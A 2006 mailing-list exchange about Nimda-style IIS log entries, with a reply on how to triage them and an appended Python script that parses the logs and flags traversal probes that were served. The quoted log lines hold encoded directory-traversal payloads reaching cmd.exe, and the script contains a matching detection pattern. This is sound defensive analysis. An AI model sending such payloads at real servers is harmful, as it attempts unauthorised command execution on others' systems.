RE: IIS http error log entries...



Since your IIS Server responded with HTTP 400 responses, there's no
reason to panic. However, you should consider doing some further
investigation.
From a web server standpoint, you'll have reason to be concerned if your
IIS Server is generating HTTP 200 responses to requests that it's not
intended to serve, but from the snippet you provided below, that's not
the case.

A few thoughts off the top of my head to consider.
Has your company hired someone to perform a penetration test? (Based on
the fact that the source IP is coming from the Netherlands, the pen. test
theory is not likely.)
It seems that this IIS Server is hosting an Internet site. Is it on a
protected subnet within your network (DMZ)? What else is on that subnet?
Is this Server hosting anything other than IIS? You'll probably want to
comb through more logs on that system and potentially on other servers
that have public exposure (such as SMTP, DNS, other web servers, etc.).
Do your public DNS servers allow zone transfers to anyone on the
Internet? If so, consider looking at each of those servers as well, or
contact the administrators of those servers if they are not your
responsibility.

-Cheers



-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx]
On Behalf Of nemanja.janic@xxxxxxxxxxxxxxxxxxxx
Sent: Tuesday, December 12, 2006 10:02 AM
To: focus-ms@xxxxxxxxxxxxxxxxx
Subject: IIS http error log entries...

Hello list,
I hope I got the right group.
I just found these in my IIS logs:

-----------------------

2006-12-08 11:38:18 87.17.7.5 2842 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:29 87.17.7.5 2929 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 2872 192.168.x.x 80 HTTP/1.0 HEAD /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 3420 192.168.x.x 80 HTTP/1.0 HEAD /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 1332 192.168.x.x 80 HTTP/1.0 HEAD /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 2105 192.168.x.x 80 HTTP/1.0 HEAD /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:39:46 87.17.7.5 2435 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:36 87.17.7.5 1933 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:41 87.17.7.5 4144 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:44 87.17.7.5 4234 192.168.x.x 80 HTTP/1.0 HEAD /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1130 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1411 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:11 87.17.7.5 1427 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:41:24 87.17.7.5 4715 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:35 87.17.7.5 1568 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:41 87.17.7.5 4751 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:41:44 87.17.7.5 1595 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -

-------------------------

I don't have much experience with this kind of thing, and from digging
the net I found that this was used in Nimda attacks a few years ago... Any
idea what's going on? Should I be worried?
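As an added illustration of the reply's triage advice (not code from either poster), here is a small Python script that parses HTTP.sys error-log (HTTPERR) lines in the 13-field layout quoted above, decodes the double-encoded traversal sequences (%%35%63 and %%35c both end up as a backslash), and separates probes the server rejected (4xx) from any it actually served (2xx), the case the reply says warrants concern. The sample lines are a few of the quoted entries rejoined, plus one constructed 200-status line from a constructed source address (203.0.113.7) to exercise the alert path; HTTPERR itself only records requests HTTP.sys rejected or timed out, so a served probe would show up in the site's W3C log instead, but the status check is the same.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Column layout of the IIS 6 HTTP.sys error log (HTTPERR\httperr*.log); it
# matches the 13 space-separated fields in the entries quoted in the post.
HTTPERR_FIELDS = (
    "date", "time", "c_ip", "c_port", "s_ip", "s_port", "cs_version",
    "cs_method", "cs_uri", "sc_status", "s_siteid", "s_reason", "s_queuename",
)

# After decoding, a traversal / command-execution probe shows a parent
# directory hop, a reference to cmd.exe, or a path into system32.
TRAVERSAL_RE = re.compile(r"\.\./|cmd\.exe|/system32/")

# Sample input: three entries rejoined from the post, plus one CONSTRUCTED
# entry (source 203.0.113.7, status 200) that stands in for a probe the
# server answered successfully.
SAMPLE_LOG = [
    r"2006-12-08 11:38:18 87.17.7.5 2842 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -",
    r"2006-12-08 11:39:46 87.17.7.5 2435 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -",
    r"2006-12-08 11:41:35 87.17.7.5 1568 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -",
    r"2006-12-08 11:42:00 203.0.113.7 1599 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 200 - - -",
]


def parse_httperr_line(line):
    """Split one HTTPERR line into a dict, or return None if it is malformed."""
    parts = line.strip().split()
    if len(parts) != len(HTTPERR_FIELDS):
        return None
    return dict(zip(HTTPERR_FIELDS, parts))


def normalize_uri(uri):
    """Undo double encoding and case/separator tricks before pattern matching.

    Two unquote() passes: '%%35%63' -> '%5c' after the first, '\\' after the
    second. Malformed escapes such as '%c1%pc' are left as they are, which is
    fine because the cmd.exe reference still survives.
    """
    decoded = unquote(unquote(uri))
    return decoded.replace("\\", "/").lower()


def classify_entry(entry):
    """Return (is_probe, served) for one parsed entry.

    Entries without a URI (for example Timer_MinBytesPerSecond timeouts)
    are never probes. served is True only for a 2xx status, which for a
    traversal probe is the outcome the reply says to worry about.
    """
    uri = entry["cs_uri"]
    if uri == "-":
        return False, False
    is_probe = bool(TRAVERSAL_RE.search(normalize_uri(uri)))
    served = entry["sc_status"].startswith("2")
    return is_probe, served


def triage(lines):
    """Count blocked probes, served probes and timeouts per source IP."""
    report = {"blocked": Counter(), "served": Counter(),
              "timeouts": Counter(), "unparsed": 0}
    for line in lines:
        entry = parse_httperr_line(line)
        if entry is None:
            report["unparsed"] += 1
            continue
        if entry["s_reason"].startswith("Timer_"):
            report["timeouts"][entry["c_ip"]] += 1
            continue
        is_probe, served = classify_entry(entry)
        if is_probe:
            report["served" if served else "blocked"][entry["c_ip"]] += 1
    return report


def sources_needing_attention(report):
    """Source IPs whose probes were served: these need a closer look."""
    return sorted(report["served"])


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for bucket in ("blocked", "served", "timeouts"):
        for ip, n in result[bucket].most_common():
            print(f"{bucket:8s} {ip:15s} {n}")
    print("investigate:", sources_needing_attention(result))
```

Run it against a real HTTPERR file by replacing SAMPLE_LOG with the file's lines; anything that lands in the "served" bucket is the signal the reply describes, while a "blocked" count from a single address over a few minutes is the ordinary scanner noise the original poster saw.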
